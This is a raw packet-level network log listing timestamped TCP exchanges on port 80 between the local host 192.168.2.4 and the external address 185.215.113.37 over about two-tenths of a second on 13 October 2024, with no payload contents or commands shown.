Oct 13, 2024 17:46:18.869415998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.869415998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.869429111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869440079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869448900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869460106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869476080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869479895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.869479895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.869488001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869498014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869508982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869514942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.869522095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869534016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869544029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869554043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869564056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869590998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.869590998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.869590998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.869648933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.957361937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957386971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957397938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957463980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.957463980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.957479000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957489967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957504034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957515955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957526922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957537889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957556009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957566023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957576990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957587004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957597017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957608938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.957608938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.957608938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.957608938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.957631111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957640886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957652092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957668066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957679033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957689047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957690954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.957690954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.957690954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.957703114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957719088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957731009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957741022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957752943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957777977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.957777977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.957777977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.957777977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.957797050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957808018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957835913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957845926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957855940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.957868099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.957868099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.957868099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.957868099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.957979918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.958364964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958415985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958426952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958439112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958494902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958506107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958515882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958525896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958528996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.958528996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.958528996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.958528996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.958540916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958561897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958570957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958574057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.958574057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.958583117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958596945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958609104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958620071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958631992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958666086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.958666086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.958666086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.958666086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.958806038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958822966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958832979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958842993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958853960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958863974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958874941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958884954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958894968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958903074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.958903074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.958903074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.958906889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958918095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.958930016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959032059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959032059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959032059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959274054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959292889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959316969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959328890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959464073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959464073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959490061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959500074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959511042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959521055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959532022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959542036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959553003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959563017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959573030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959583998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959599972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959599972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959599972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959599972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959600925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959621906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959633112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959644079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959667921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959667921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959667921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959738970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959749937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959765911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959775925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959786892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959789991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959789991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959789991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959798098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959816933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959826946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959837914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959847927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959858894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959868908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959882975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959882975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959882975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959882975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959886074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959897995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959908962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959924936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959942102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959952116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959964037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959975004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.959980011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959980011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.959980011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.960043907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960057974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960069895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960094929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.960094929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.960094929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.960181952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960191965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960202932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960211039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.960211039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.960213900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960225105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960236073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960247993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960258007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960268974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960273981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.960273981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.960273981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.960386038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960397005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960407019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960417986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960422993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.960422993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.960422993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.960431099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960442066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960453987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960463047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.960472107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.960472107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.960659027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.960659027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.047987938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048026085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048036098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048052073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048063993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048074007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048084974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048108101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048118114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048120022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.048120022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.048120022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.048136950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048151016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048161983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048166037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.048166037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.048175097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048186064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048207998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.048227072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048237085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.048238993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048252106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048263073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048310995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048315048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.048315048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.048315048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.048322916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048333883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048346996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048384905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.048384905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.048415899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048429012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048439026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048450947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048523903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048536062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.048559904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.048559904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.048559904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.048635960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.049103975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049117088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049129009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049201012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.049201012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.049266100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049283981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049293995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049304962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049304962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.049319983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049374104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.049375057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.049416065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049428940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049441099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049446106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049453020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.049458027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049468994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049478054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049478054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.049488068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049493074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049510956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049520016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049529076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.049537897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049547911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049559116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049568892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049575090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.049575090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.049575090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.049581051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049612999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.049633026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049633026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.049643993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049654961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049665928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049679041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049688101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049715042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.049715042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.049776077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.049796104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049814939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049825907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.049843073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.049875975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050245047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050257921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050268888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050339937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050348043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050348997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050349951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050362110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050373077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050384998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050395966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050438881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050438881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050438881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050438881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050518990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050535917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050546885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050556898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050566912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050579071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050590038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050601959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050611973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050615072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050615072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050615072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050615072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050621986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050632954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050645113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050654888 CEST	80	49730	185.215.113.37	192.168.2.4
